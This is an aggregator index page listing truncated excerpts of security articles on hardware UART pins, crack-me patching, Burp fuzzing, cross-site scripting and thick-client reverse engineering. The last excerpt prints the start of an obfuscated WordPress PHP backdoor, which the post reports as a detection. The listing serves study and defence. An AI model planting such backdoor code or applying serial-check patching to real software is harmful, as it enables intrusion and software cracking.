HackDig : Dig high-quality web security articles for hackers

Identifying UART Pins Without a Multi-Meter

As someone who likes to tinker with hardware, we often find ourselves opening up a device to find UART pins which are originally meant for debugging and testing We often use these to connect to the device. But most of us hit a small snag here. Snag No 1: More often than not the pins are not labeled. (So you mean they put those pins there so we can te
Publish At:2019-09-19 14:11 | Read:735 | Comments:0 | Tags:Knowledge-base SecureLayer7 Lab HardwareSecurity Identifying

Reverse Engineering 101 – With Crack-mes

Reverse Engineering is an fascinating art of playing with low level code. In this article, we will see a hands-on tutorial for patching an exe file to accept any serial key! Tool for use: ● Ollydbg (http://www.ollydbg.de/) ● A crack-me for demonstration. You can download loads of crack-mes for hands-on practice from http://crackmes.de/ A crack-me is a small
Publish At:2017-09-15 21:40 | Read:4701 | Comments:0 | Tags:SecureLayer7 Lab Crackme Ollydbg Reverse Engineering

Automating Web Apps Input fuzzing via Burp Macros

Hi Readers, This article is about Burp Suite Macros which helps us in automating efforts of manual input payload fuzzing. While it may be know to many testers, this article is written for those who are yet to harness the power of burp suite’s macro automation. In my penetration testing career so far, while performing fuzzing of parameters and page fiel
Publish At:2017-09-03 05:00 | Read:4450 | Comments:0 | Tags:Knowledge-base OWASP SecureLayer7 Lab burp suite fuzzing inp

OWASP Top 10 : Cross-Site Scripting #3 Bad JavaScript Imports

Need to include cross domain resources: The ever growing need of giving a rich user experience to website visitors have made the need for browsers to include cross origin resource. Sometimes these resources can be data, a frame, an image or JavaScript. For example: A website http://example.com can have the following cross origin resources: Data from websit
Publish At:2017-08-28 03:30 | Read:5433 | Comments:0 | Tags:OWASP SecureLayer7 Lab Bad JavaScript Imports Client Side At

Static Analysis,Memory Forensics & Reverse Engineering on Thick Client Penetration Testing – Part 4

Static Analysis/ Reverse Engineering for Thick Clients Penetration Testing 4 Hi Readers, let’s take a look into static analysis. The advantage which thick clients offer over web applications are the ability to inspect the code and perform code level fuzzing which is more interesting for me! How to inspect code at a static level? There are many test cases whi
Publish At:2017-08-06 15:05 | Read:3770 | Comments:0 | Tags:SecureLayer7 Lab

Backdoor PHP code WordPress

We have detected a Backdoor PHP code. It is often hidden in the WP writable directory. This backdoor is used to send PHP code execution.   <?php $yeqqdvu = 6110; function neceliemyz($rdcldpm, $oqwvlr) { $efogjgyh = ”; for($i=0; $i < strlen($rdcldpm); $i++){ $efogjgyh .= isset($oqwvlr[$rdcldpm[$i]]) ? $oqwvlr[$rdcldpm[$i]] : $rdcldpm[$i]; } $
Publish At:2016-04-21 12:40 | Read:3596 | Comments:0 | Tags:SecureLayer7 Lab Backdoor PHP code Wordpress


Share high-quality web security related articles with you:)